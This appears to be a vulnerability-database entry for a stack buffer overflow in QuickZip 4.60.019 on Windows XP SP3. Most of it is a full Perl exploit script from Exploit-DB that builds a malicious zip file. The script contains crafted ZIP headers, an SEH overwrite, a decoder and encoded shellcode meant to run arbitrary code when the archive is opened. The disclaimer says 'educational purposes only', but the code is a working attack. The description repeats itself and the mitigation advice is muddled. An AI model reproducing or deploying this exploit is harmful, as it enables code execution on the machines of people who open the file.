QuickZip 4.60.019 Stack BOF - XP SP3

vendor:

QuickZip

by:

corelanc0d3r

9,3

CVSS

HIGH

Stack Buffer Overflow

119

CWE

Product Name: QuickZip

Affected Version From: 4.60.019

Affected Version To: 4.60.019

Patch Exists: YES

Related CWE: N/A

CPE: a:quickzip:quickzip:4.60.019

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

QuickZip 4.60.019 Stack BOF – XP SP3

A stack buffer overflow vulnerability exists in QuickZip 4.60.019 when handling specially crafted input. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability is due to a boundary error when handling user-supplied input. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability is due to a boundary error when handling user-supplied input.

Mitigation:

Upgrade to the latest version of QuickZip 4.60.019 or later.

Source

Exploit-DB raw data:

# Exploit Title : QuickZip 4.60.019 Stack BOF - XP SP3
# OSVDB-ID      : 62781
# Date          : March 2nd 2010
# Author        : corelanc0d3r
# Bug found by  : corelanc0d3r
# Software Link : http://www.quickzip.org/downloads.html
# Version       : 4.60.019
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox) - offset is 297.
#                 You may have to change this to 294
# Type of vuln  : SEH, with ppr from OS dll
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ----------------------------------------------------------------------------------------------------
# Detailed write-up about this vulnerability and exploit
# can be found at
# http://www.offensive-security.com/blog/vulndev/quickzip-stack-bof-a-box-of-chocolates-part-2/
# ----------------------------------------------------------------------------------------------------
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Code :
print "|------------------------------------------------------------------|\n";
print "|                         __               __                      |\n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n";
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n";
print "|                                                                  |\n";
print "|                                       http://www.corelan.be:8800 |\n";
print "|                                                                  |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "           --==[ Exploit for QuickZip 4.60.019 ]==-- \n\n";

my $sploitfile="corelansploit.zip";
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f". 
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00". 
"\x02\x10\x00\x00". 
"\x00\x00";

print "[+] Preparing payload\n";

my $nseh="\x41\x41\x41\x41";  
my $seh="\x65\x47\x7e\x6d";   

my $payload = "B" x 297 . $nseh . $seh;  
my $predecoder = "\x59\x59\x59\x51\x5c"; 
my $decoder="\x25\x4A\x4D\x4E\x55".  
"\x25\x35\x32\x31\x2A".
"\x2D\x55\x55\x55\x5F".    
"\x2D\x55\x55\x55\x5F".
"\x2D\x56\x55\x56\x5F".
"\x50".                     
"\x25\x4A\x4D\x4E\x55".     
"\x25\x35\x32\x31\x2A".
"\x2D\x2A\x6A\x31\x55".     
"\x2D\x2A\x6A\x31\x55".
"\x2D\x2B\x5A\x30\x55".
"\x50".                     
"\x73\xf7";                 

$payload=$payload.$predecoder.$decoder;
my $filltoecx="B" x (100-length($predecoder.$decoder));

my $shellcode = "IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BB".
"ABXP8ABuJIhYXkOkXYt4vDjT4qYBNRQjfQO93TLKRQ00nkSFDLLKT6uLN".
"kqV4HLKQnwPLKWF5hPOVxqeicryuQkayoKQU0lKplwTUtlKaUGLlKf4tE".
"CHvaHjNkpJDXLKCjUp6aJKhcgGG9LKp4nk5QxnvQkOP1iPIlNLmTO0RTU".
"ZjaZo4MUQO7M9Xqio9oKOGKcLQ4WXrUKnnkpZdds18kQvnkTLRknkpZUL".
"WqJKlKtDlKUQJHk91Tq4wl3QXCmbs819xTk9HemYkr58LNRntNjLRrKXO".
"lyoio9oNiBe34mkqnjxYr43LGwl7TBrJHLKyokOiomYCuUXQxrL0lupKO".
"QxVSebTnPdbH0uRSsU1bLHQLq4tJNim6RvIoRuWtNio2BpMkI8NBRmmlK".
"7uL7T1BKXQNKOyoYocXPstzQHq0cXWPQcsQRY1xFPRDp3rRcX0lQq0ncS".
"phrCrOCBpefQkknhqL4dwbNiIsSXrEu4PXUpqxepvP47rNQxPb2ErE2NU".
"8SQT6e5WPQxbOpu5psXQxE1CXgPPy0h1qrHCQcXPhrMpuSQphVQO9nh0L".
"6DuNK9HatqKbPR3cV1RrYoxPDqkprpKObuvhA";

my $rest = "C" x  (4064-length($payload.$filltoecx.$shellcode)) . ".txt";
$payload = $payload.$filltoecx.$shellcode.$rest;

my $evilzip = $ldf_header.$payload.$cdf_header.$payload.$eofcdf_header;

print "[+] Writing payload to file\n";

open(FILE,">$sploitfile");
print FILE $evilzip;
close(FILE);
print "[+] Wrote ".length($evilzip)." bytes to file $sploitfile\n";